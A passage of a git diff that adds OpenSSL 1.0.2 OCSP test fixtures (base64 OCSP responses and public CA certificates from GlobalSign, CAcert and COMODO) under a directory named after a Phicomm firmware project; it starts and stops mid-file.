+CX8nj6Xu7ERD6JO/ZQ9Xr7YVzKKN+3cVZlcMHoGBnOPcO2Sz0AcYyk5m5IsGBRoT
+T86j6Cr9PhOPTVwXL6Wxy1KVHsUZXUwnRacV0O4SHWQ4zM9Sablus9fTbh1CgIqW
+sKDyzVB4yECXkBVeUlA+cuCaRRVHRiR+jPDSgbU62nnNudEpGG7dyoop6IOvXv2O
+ydncWzaukxIVvQ/Ij85kHqs7HQIDAQABo4GEMIGBMAkGA1UdEwQCMAAwDgYDVR0P
+AQH/BAQDAgeAMBMGA1UdJQQMMAoGCCsGAQUFBwMJMA8GCSsGAQUFBzABBQQCBQAw
+HQYDVR0OBBYEFKlNd+0hlfSUtP3PBVJALkl+nemqMB8GA1UdIwQYMBaAFLCwSv0c
+dSj4HGGqE/b6wZA9axajMA0GCSqGSIb3DQEBBQUAA4IBAQCe4rZg61Dmwygl/Uae
+BJZog64/FvuB1sfCqKLJTjKOfLcugSTX1TT7bLJbzXRGPQuorI3TIZEOwldIw01d
+DTLlsOCHrfHd+bpxgijxPkUuaA4NYnpvqTEMJqPKOC8QYfKupNjAPSuHvwqvqCfO
+RCe3jY6xQDO0WCTZ8/xMsOkw+J/YEYqALETf2Ug7k5eRL/TvfLd8Sgi7vPfmUeiW
+ptlsbhMOWQoQc+JA3vCI01rrjNq+0kIZ/r8nPGvablRr0Aakk6eDuS2dcReaPwuK
+0xE136pJYiXdQ3SA7uwmlorjxmejavyoPCr23TU74DQEt6hhc6uIcabsa4Y8KvJy
+RI4F
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISDOSC_D2.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISDOSC_D2.ors
new file mode 100644
index 0000000..664c8d2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISDOSC_D2.ors
@@ -0,0 +1,32 @@
+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
+fBIRKjnK621vAWvc7UR+0hqnZ+Y=
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISDOSC_D3.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISDOSC_D3.ors
new file mode 100644
index 0000000..ac2bb25
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISDOSC_D3.ors
@@ -0,0 +1,38 @@
+MIIG8AoBAKCCBukwggblBgkrBgEFBQcwAQEEggbWMIIG0jCB+aF+MHwxCzAJBgNV
+BAYTAkFVMQwwCgYDVQQIEwNOU1cxDzANBgNVBAcTBlN5ZG5leTEUMBIGA1UEChML
+Q0FjZXJ0IEluYy4xHjAcBgNVBAsTFVNlcnZlciBBZG1pbmlzdHJhdGlvbjEYMBYG
+A1UEAxMPb2NzcC5jYWNlcnQub3JnGA8yMDEyMTAxMTEwMTAyMVowZjBkMDwwCQYF
+Kw4DAhoFAAQUi6TJyxcpGUU+u45zCZG5JfKDImUEFBa1MhvUx/Pg5o7zvdKwOu6y
+ORjRAgMLs8aAABgPMjAxMjEwMTEwOTUyNDJaoBEYDzIwMTIxMDEzMTAxMDIxWjAN
+BgkqhkiG9w0BAQUFAAOCAQEAWX7faLDXkmIdOv/IKBh7awhPmGUhFPVSrMI4dc9/
+fcPDOYhFwWr9evKT/QdXRGpZY493mfa4Z6eEDxRDTexOloaiaJzVpSeV9hoJUxoS
+8NEWDyi33bDlIJH6zru4kk1LpuSMiSWsvLaeoRhHmW3EPDeadpCa5tYX2yNW5hdP
+iCfphDJ34/hWHHwHP6mLd1wEO1Rw6nymqeDbuLk1FviD/ZWXMGzK8Sv++tmsQ0Tg
+7XrkIPcSrozPKOTCf/1iJVF5KeQVIb0Ju1PvGUKtGaVTX8IZQmer2WQ1D6OOUcsS
+cWA6NSpWmScX/0/uBpXdSDX0AnGUS9SNrPNEolz6rA5OUaCCBL4wggS6MIIEtjCC
+Ap6gAwIBAgIDCpvzMA0GCSqGSIb3DQEBBQUAMHkxEDAOBgNVBAoTB1Jvb3QgQ0Ex
+HjAcBgNVBAsTFWh0dHA6Ly93d3cuY2FjZXJ0Lm9yZzEiMCAGA1UEAxMZQ0EgQ2Vy
+dCBTaWduaW5nIEF1dGhvcml0eTEhMB8GCSqGSIb3DQEJARYSc3VwcG9ydEBjYWNl
+cnQub3JnMB4XDTExMDgyMzAwMDI1NloXDTEzMDgyMjAwMDI1NlowfDELMAkGA1UE
+BhMCQVUxDDAKBgNVBAgTA05TVzEPMA0GA1UEBxMGU3lkbmV5MRQwEgYDVQQKEwtD
+QWNlcnQgSW5jLjEeMBwGA1UECxMVU2VydmVyIEFkbWluaXN0cmF0aW9uMRgwFgYD
+VQQDEw9vY3NwLmNhY2VydC5vcmcwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
+AoIBAQCcxtRv5CPHw3BLdR/k/K72YsRgodbP+UdAONmvBvWzhwm6B8h6O+M64sFr
+2w6be7SYBECIyOQgNJ1flK4MoAWhdBA/H5NtxaDOKbAqA27tO9GaevcPp7c518O0
+3hVnlPLvsN1f48nY0jQOXUTfv5nYXmD0OSSK/V3IRo0KsWB6T9UnMGCeEwb4Oqqz
+uzM0b4SBflzMEony/m6Tg/qL7qs2TLZAqe77+BZaVdFkDUnaBN7RyMruXySxeXiz
+mogT3WhROeloMa/X+E01bWBYBEK7VZIY9pgBpXQ7vDbbIGgYuIXUi20wh03WMy16
+VDYdV0IUXHpidNUeK9W/BPP/7APBAgMBAAGjRDBCMAwGA1UdEwEB/wQCMAAwJwYD
+VR0lBCAwHgYIKwYBBQUHAwIGCCsGAQUFBwMBBggrBgEFBQcDCTAJBgNVHREEAjAA
+MA0GCSqGSIb3DQEBBQUAA4ICAQAoT6p5f3cGprAcgrnzdenfTmDe9LCW7k2VnazA
+MAzpsD6gXcSlo4+3hoHem/SpKRH2tqi34DmImCiv/S6fxsKM4Gfn5rlkAFviuTvS
+r5Zrwh4ZKSfaoWv4bmbzmcAxvuxdMWHf/5PbjegjzFTbBMekVPZY/abYtD6kdHQZ
+VNgzwZVfTBfYhfa+Rg72I2zjKpMsjxMqWfTmUzW6wfK6LFudZqu0U1NnJw+IlnVU
+6WtjL885ebQrmcRqWz3nMhVLIu5L3w/s+VTLvm7If6jcMDNUjz8s2BPcJeCXg3TE
+STsyl6tvk17RRz2+9JskxVOk11xIn96xR4FCERIid2ek9z1xi7oYOajQF50i/9Gj
+ReDEfRSyb4/LzoKDOY+h4Q6jryeHh7WIHFiK5qrBN2y8qOoRJ/OqQnqci/BJBNpe
+g9Q9PJRgGSzRndTXNHiYRbeLpq7eGo3sPqlR9qBQ3rd98XGOU0RCMnzjKhENC3qo
+5PkSF2xs8RmjWktFSTDwjYo0qf1teo7CGHjgaPjQ7JE8Q4ysFOQndSWmLpqwDcI9
+HfIvPwUIWArQrJRh9LCNSyvHVgLqY9kw8NW4TlMxV2WqaYCkiKi3XVRrSFR3ahS1
+VBvRZ8KpplrV7rhXjVSSqqfLk1sX3l72Ck2F9ON+qbNFmvhgNjSiBY9neMgo804a
+wG/paw==
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISIC_D1_Issuer_ICA.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISIC_D1_Issuer_ICA.pem
new file mode 100644
index 0000000..b884775
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISIC_D1_Issuer_ICA.pem
@@ -0,0 +1,27 @@
+-----BEGIN CERTIFICATE-----
+MIIEhjCCA26gAwIBAgILBAAAAAABL07hXdQwDQYJKoZIhvcNAQEFBQAwTDEgMB4G
+A1UECxMXR2xvYmFsU2lnbiBSb290IENBIC0gUjIxEzARBgNVBAoTCkdsb2JhbFNp
+Z24xEzARBgNVBAMTCkdsb2JhbFNpZ24wHhcNMTEwNDEzMTAwMDAwWhcNMjIwNDEz
+MTAwMDAwWjBZMQswCQYDVQQGEwJCRTEZMBcGA1UEChMQR2xvYmFsU2lnbiBudi1z
+YTEvMC0GA1UEAxMmR2xvYmFsU2lnbiBFeHRlbmRlZCBWYWxpZGF0aW9uIENBIC0g
+RzIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDNoUbMUpq4pbR/WNnN
+2EugcgyXW6aIIMO5PUbc0FxSMPb6WU+FX7DbiLSpXysjSKyr9ZJ4FLYyD/tcaoVb
+AJDgu2X1WvlPZ37HbCnsk8ArysRe2LDb1r4/mwvAj6ldrvcAAqT8umYROHf+IyAl
+VRDFvYK5TLFoxuJwe4NcE2fBofN8C6iZmtDimyUxyCuNQPZSY7GgrVou9Xk2bTUs
+Dt0F5NDiB0i3KF4r1VjVbNAMoQFGAVqPxq9kx1UBXeHRxmxQJaAFrQCrDI1la93r
+wnJUyQ88ABeHIu/buYZ4FlGud9mmKE3zWI2DZ7k0JZscUYBR84OSaqOuR5rW5Isb
+wO2xAgMBAAGjggFaMIIBVjAOBgNVHQ8BAf8EBAMCAQYwEgYDVR0TAQH/BAgwBgEB
+/wIBADAdBgNVHQ4EFgQUsLBK/Rx1KPgcYaoT9vrBkD1rFqMwRwYDVR0gBEAwPjA8
+BgRVHSAAMDQwMgYIKwYBBQUHAgEWJmh0dHBzOi8vd3d3Lmdsb2JhbHNpZ24uY29t
+L3JlcG9zaXRvcnkvMDYGA1UdHwQvMC0wK6ApoCeGJWh0dHA6Ly9jcmwuZ2xvYmFs
+c2lnbi5uZXQvcm9vdC1yMi5jcmwwRAYIKwYBBQUHAQEEODA2MDQGCCsGAQUFBzAB
+hihodHRwOi8vb2NzcC5nbG9iYWxzaWduLmNvbS9FeHRlbmRlZFNTTENBMCkGA1Ud
+JQQiMCAGCCsGAQUFBwMBBggrBgEFBQcDAgYKKwYBBAGCNwoDAzAfBgNVHSMEGDAW
+gBSb4gdXZxwewGoG3lm0mi3f3BmGLjANBgkqhkiG9w0BAQUFAAOCAQEAL0m28rZa
+pJWrnlrpK4KbzJBrfHRFIOde2Mcj7ig1sTVlKqVR4FU/9oNntOQ2KbDa7JeVqYoF
+o0X+Iy5SiLQfEICt0oufo1+oxetz3nmIQZgz7qdgGLFGyUAQB5yPClLJExoGbqCb
+LTr2rk/no1E1KlsYBRLlUdy2NmLz4aQP++TPw5S/EauhWTEB8MxT7I9j12yW00gq
+iiPtRVaoZkHqAblH7qFHDBTxI+Egc8p9UHxkOFejj0qcm+ltRc9Ea01gIEBxJbVG
+qmwIft/I+shWKpLLg7h5CZctXqEBzgbttJfJBNxB7+BPNk3kQHNG7BESfIhbNCYl
+TercGL7FG81kwQ==
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISIC_D2_Issuer_Root.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISIC_D2_Issuer_Root.pem
new file mode 100644
index 0000000..22f34cb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISIC_D2_Issuer_Root.pem
@@ -0,0 +1,21 @@
+-----BEGIN CERTIFICATE-----
+MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG
+A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv
+b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw
+MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i
+YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT
+aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ
+jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp
+xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz8kHp
+1Wrjsok6Vjk4bwY8iGlbKk3Fp1S4bInMm/k8yuX9ifUSPJJ4ltbcdG6TRGHRjcdG
+snUOhugZitVtbNV4FpWi6cgKOOvyJBNPc1STE4U6G7weNLWLBYy5d4ux2x8gkasJ
+U26Qzns3dLlwR5EiUWMWea6xrkEmCMgZK9FGqkjWZCrXgzT/LCrBbBlDSgeF59N8
+9iFo7+ryUp9/k5DPAgMBAAGjQjBAMA4GA1UdDwEB/wQEAwIBBjAPBgNVHRMBAf8E
+BTADAQH/MB0GA1UdDgQWBBRge2YaRQ2XyolQL30EzTSo//z9SzANBgkqhkiG9w0B
+AQUFAAOCAQEA1nPnfE920I2/7LqivjTFKDK1fPxsnCwrvQmeU79rXqoRSLblCKOz
+yj1hTdNGCbM+w6DjY1Ub8rrvrTnhQ7k4o+YviiY776BQVvnGCv04zcQLcFGUl5gE
+38NflNUVyRRBnMRddWQVDf9VMOyGj/8N7yy5Y0b2qvzfvGn9LhJIZJrglfCm7ymP
+AbEVtQwdpf5pLGkkeB6zpxxxYu7KyJesF12KwvhHhm4qxFYxldBniYUr+WymXUad
+DKqC5JlR3XC321Y9YeRq4VzW9v493kHMB65jUr9TU/Qr6cf9tveCX4XSQRjbgbME
+HMUfpIBvFSDJ3gyICh3WZlXi/EjJKSZp4Q==
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISIC_D3_Issuer_Root.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISIC_D3_Issuer_Root.pem
new file mode 100644
index 0000000..c1752e6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISIC_D3_Issuer_Root.pem
@@ -0,0 +1,41 @@
+-----BEGIN CERTIFICATE-----
+MIIHPTCCBSWgAwIBAgIBADANBgkqhkiG9w0BAQQFADB5MRAwDgYDVQQKEwdSb290
+IENBMR4wHAYDVQQLExVodHRwOi8vd3d3LmNhY2VydC5vcmcxIjAgBgNVBAMTGUNB
+IENlcnQgU2lnbmluZyBBdXRob3JpdHkxITAfBgkqhkiG9w0BCQEWEnN1cHBvcnRA
+Y2FjZXJ0Lm9yZzAeFw0wMzAzMzAxMjI5NDlaFw0zMzAzMjkxMjI5NDlaMHkxEDAO
+BgNVBAoTB1Jvb3QgQ0ExHjAcBgNVBAsTFWh0dHA6Ly93d3cuY2FjZXJ0Lm9yZzEi
+MCAGA1UEAxMZQ0EgQ2VydCBTaWduaW5nIEF1dGhvcml0eTEhMB8GCSqGSIb3DQEJ
+ARYSc3VwcG9ydEBjYWNlcnQub3JnMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
+CgKCAgEAziLA4kZ97DYoB1CW8qAzQIxL8TtmPzHlawI229Z89vGIj053NgVBlfkJ
+8BLPRoZzYLdufujAWGSuzbCtRRcMY/pnCujW0r8+55jE8Ez64AO7NV1sId6eINm6
+zWYyN3L69wj1x81YyY7nDl7qPv4coRQKFWyGhFtkZip6qUtTefWIonvuLwphK42y
+fk1WpRPs6tqSnqxEQR5YYGUFZvjARL3LlPdCfgv3ZWiYUQXw8wWRBB0bF4LsyFe7
+w2t6iPGwcswlWyCR7BYCEo8y6RcYSNDHBS4CMEK4JZwFaz+qOqfrU0j36NK2B5jc
+G8Y0f3/JHIJ6BVgrCFvzOKKrF11myZjXnhCLotLddJr3cQxyYN/Nb5gznZY0dj4k
+epKwDpUeb+agRThHqtdB7Uq3EvbXG4OKDy7YCbZZ16oE/9KTfWgu3YtLq1i6L43q
+laegw1SJpfvbi1EinbLDvhG+LJGGi5Z4rSDTii8aP8bQUWWHIbEZAWV/RRyH9XzQ
+QUxPKZgh/TMfdQwEUfoZd9vUFBzugcMd9Zi3aQaRIt0AUMyBMawSB3s42mhb5ivU
+fslfrejrckzzAeVLIL+aplfKkQABi6F1ITe1Yw1nPkZPcCBnzsXWWdsC4PDSy826
+YreQQejdIOQpvGQpQsgi3Hia/0PsmBsJUUtaWsJx8cTLc6nloQsCAwEAAaOCAc4w
+ggHKMB0GA1UdDgQWBBQWtTIb1Mfz4OaO873SsDrusjkY0TCBowYDVR0jBIGbMIGY
+gBQWtTIb1Mfz4OaO873SsDrusjkY0aF9pHsweTEQMA4GA1UEChMHUm9vdCBDQTEe
+MBwGA1UECxMVaHR0cDovL3d3dy5jYWNlcnQub3JnMSIwIAYDVQQDExlDQSBDZXJ0
+IFNpZ25pbmcgQXV0aG9yaXR5MSEwHwYJKoZIhvcNAQkBFhJzdXBwb3J0QGNhY2Vy
+dC5vcmeCAQAwDwYDVR0TAQH/BAUwAwEB/zAyBgNVHR8EKzApMCegJaAjhiFodHRw
+czovL3d3dy5jYWNlcnQub3JnL3Jldm9rZS5jcmwwMAYJYIZIAYb4QgEEBCMWIWh0
+dHBzOi8vd3d3LmNhY2VydC5vcmcvcmV2b2tlLmNybDA0BglghkgBhvhCAQgEJxYl
+aHR0cDovL3d3dy5jYWNlcnQub3JnL2luZGV4LnBocD9pZD0xMDBWBglghkgBhvhC
+AQ0ESRZHVG8gZ2V0IHlvdXIgb3duIGNlcnRpZmljYXRlIGZvciBGUkVFIGhlYWQg
+b3ZlciB0byBodHRwOi8vd3d3LmNhY2VydC5vcmcwDQYJKoZIhvcNAQEEBQADggIB
+ACjH7pyCArpcgBLKNQodgW+JapnM8mgPf6fhjViVPr3yBsOQWqy1YPaZQwGjiHCc
+nWKdpIevZ1gNMDY75q1I08t0AoZxPuIrA2jxNGJARjtT6ij0rPtmlVOKTV39O9lg
+18p5aTuxZZKmxoGCXJzN600BiqXfEVWqFcofN8CCmHBh22p8lqOOLlQ+TyGpkO/c
+gr/c6EWtTZBzCDyUZbAEmXZ/4rzCahWqlwQ3JNgelE5tDlG+1sSPypZt90Pf6DBl
+Jzt7u0NDY8RD97LsaMzhGY4i+5jhe1o+ATc7iwiwovOVThrLm82asduycPAtStvY
+sONvRUgzEv/+PDIqVPfE94rwiCPCR/5kenHA0R6mY7AHfqQv0wGP3J8rtsYIqQ+T
+SCX8Ev2fQtzzxD72V7DX3WnRBnc0CkvSyqD/HMaMyRa+xMwyN2hzXwj7UfdJUzYF
+CpUCTPJ5GhD22Dp1nPMd8aINcGeGG7MW9S/lpOt5hvk9C8JzC6WZrG/8Z7jlLwum
+GCSNe9FINSkYQKyTYOGWhlC0elnYjyELn8+CkcY7v2vcB5G5l1YjqrZslMZIBjzk
+zk6q5PYvCdxTby78dOs6Y5nCpqyJvKeyRKANihDjbPIky/qbn3BHLt4Ui9SyIAmW
+omTxJBzcoTWcFbLUvFUufQb1nA5V9FrWk9p2rSVzTMVE
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISIC_ND1_Issuer_ICA.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISIC_ND1_Issuer_ICA.pem
new file mode 100644
index 0000000..25bb90f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISIC_ND1_Issuer_ICA.pem
@@ -0,0 +1,29 @@
+-----BEGIN CERTIFICATE-----
+MIIFBjCCA+6gAwIBAgIQEaO00OyNt3+doM1dLVEvQjANBgkqhkiG9w0BAQUFADCB
+gTELMAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4G
+A1UEBxMHU2FsZm9yZDEaMBgGA1UEChMRQ09NT0RPIENBIExpbWl0ZWQxJzAlBgNV
+BAMTHkNPTU9ETyBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAeFw0xMDA1MjQwMDAw
+MDBaFw0yMDA1MzAxMDQ4MzhaMIGOMQswCQYDVQQGEwJHQjEbMBkGA1UECBMSR3Jl
+YXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHEwdTYWxmb3JkMRowGAYDVQQKExFDT01P
+RE8gQ0EgTGltaXRlZDE0MDIGA1UEAxMrQ09NT0RPIEV4dGVuZGVkIFZhbGlkYXRp
+b24gU2VjdXJlIFNlcnZlciBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC
+ggEBAMxKljPNJY1n7iiWN4dG8PYEooR/U6qW5h+xAhxu7X0h1Nc8HqLYaS+ot/Wi
+7WRYZOFEZTZJQSABjTsT4gjzDPJXOZM3txyTRIOOvy3xoQV12m7ue28b6naDKHRK
+HCvT9cQDcpOvhs4JjDx11MkKL3Lzrb0OMDyEoXMfAyUUpY/D1vS15N2GevUZumjy
+hVSiMBHK0ZLLO3QGEqA3q2rYVBHfbJoWlLm0p2XGdC0x801S6VVRn8s+oo12mHDS
+b6ZlRS8bhbtbbfnywARmE4R6nc4n2PREnr+svpnba0/bWCGwiSe0jzLWS15ykV7f
+BZ3ZSS/0tm9QH3XLgJ3m0+TR8tMCAwEAAaOCAWkwggFlMB8GA1UdIwQYMBaAFAtY
+5YvGTBU3pECpMKkhvkc2Wlb/MB0GA1UdDgQWBBSIRFH/UCppXi2I9CG62Qzyzsvq
+fDAOBgNVHQ8BAf8EBAMCAQYwEgYDVR0TAQH/BAgwBgEB/wIBADA+BgNVHSAENzA1
+MDMGBFUdIAAwKzApBggrBgEFBQcCARYdaHR0cHM6Ly9zZWN1cmUuY29tb2RvLmNv
+bS9DUFMwSQYDVR0fBEIwQDA+oDygOoY4aHR0cDovL2NybC5jb21vZG9jYS5jb20v
+Q09NT0RPQ2VydGlmaWNhdGlvbkF1dGhvcml0eS5jcmwwdAYIKwYBBQUHAQEEaDBm
+MD4GCCsGAQUFBzAChjJodHRwOi8vY3J0LmNvbW9kb2NhLmNvbS9DT01PRE9BZGRU
+cnVzdFNlcnZlckNBLmNydDAkBggrBgEFBQcwAYYYaHR0cDovL29jc3AuY29tb2Rv
+Y2EuY29tMA0GCSqGSIb3DQEBBQUAA4IBAQCaQ7+vpHJezX1vf/T8PYy7cOYe3QT9
+P9ydn7+JdpvyhjH8f7PtKpFTLOKqsOPILHH3FYojHPFpLoH7sbxiC6saVBzZIl40
+TKX2Iw9dej3bQ81pfhc3Us1TocIR1FN4J2TViUFNFlW7kMvw2OTd3dMJZEgo/zIj
+hC+Me1UvzymINzR4DzOq/7fylqSbRIC1vmxWVKukgZ4lGChUOn8sY89ZIIwYazgs
+tN3t40DeDDYlV5rA0WCeXgNol64aO+pF11GZSe5EWVYLXrGPaOqKnsrSyaADfnAl
+9DLJTlCDh6I0SD1PNXf82Ijq9n0ezkO21cJqfjhmY03n7jLvDyToKmf7
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISIC_ND2_Issuer_Root.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISIC_ND2_Issuer_Root.pem
new file mode 100644
index 0000000..129eb4b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISIC_ND2_Issuer_Root.pem
@@ -0,0 +1,23 @@
+-----BEGIN CERTIFICATE-----
+MIID0DCCArigAwIBAgIQIKTEf93f4cdTYwcTiHdgEjANBgkqhkiG9w0BAQUFADCB
+gTELMAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4G
+A1UEBxMHU2FsZm9yZDEaMBgGA1UEChMRQ09NT0RPIENBIExpbWl0ZWQxJzAlBgNV
+BAMTHkNPTU9ETyBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAeFw0xMTAxMDEwMDAw
+MDBaFw0zMDEyMzEyMzU5NTlaMIGBMQswCQYDVQQGEwJHQjEbMBkGA1UECBMSR3Jl
+YXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHEwdTYWxmb3JkMRowGAYDVQQKExFDT01P
+RE8gQ0EgTGltaXRlZDEnMCUGA1UEAxMeQ09NT0RPIENlcnRpZmljYXRpb24gQXV0
+aG9yaXR5MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0ECLi3LjkRv3
+UcEbVASY06m/weaKXTuH+7uIzg3jLz8GlvCiKVCZrts7oVewdFFxze1CkU1B/qnI
+2GqGd0S7WWaXUF601CxwRM/aN5VCaTwwxHGzUvAhTaHYujl8HJ6jJJ3ygxaYqhZ8
+Q5sVW7euNJH+1GImGEaaP+vB+fGQV+useg2L23IwambV4EajcNxo2f8ESIl33rXp
++2dtQem8Ob0y2WIC8bGoPW43nOIv4tOiJovGuFVDiOEjPqXSJDlqR6sA1KGzqSX+
+DT+nHbrTUcELpNqsOO9VUCQFZUaTNE8tja3G1CEZ0o7KBWFxB3NH5YoZEr0ETc5O
+nKVIrLsm9wIDAQABo0IwQDAdBgNVHQ4EFgQUC1jli8ZMFTekQKkwqSG+RzZaVv8w
+DgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQEFBQAD
+ggEBAC/JxBwHO89hAgCx2SFRdXIDMLDEFh9sAIsQrK/xR9SuEDwMGvjUk2ysEDd8
+t6aDZK3N3w6HM503sMZ7OHKx8xoOo/lVem0DZgMXlUrxsXrfViEGQo+x06iF3u6X
